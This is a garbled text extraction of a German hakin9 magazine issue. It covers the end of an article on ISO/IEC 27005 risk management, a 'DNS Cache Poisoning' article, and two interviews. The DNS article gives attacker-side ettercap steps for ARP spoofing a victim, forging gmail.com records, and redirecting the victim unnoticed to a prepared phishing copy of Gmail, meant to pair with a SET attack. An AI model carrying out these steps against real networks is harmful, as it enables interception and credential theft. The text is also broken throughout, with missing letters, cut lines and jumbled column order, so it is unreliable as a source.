RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
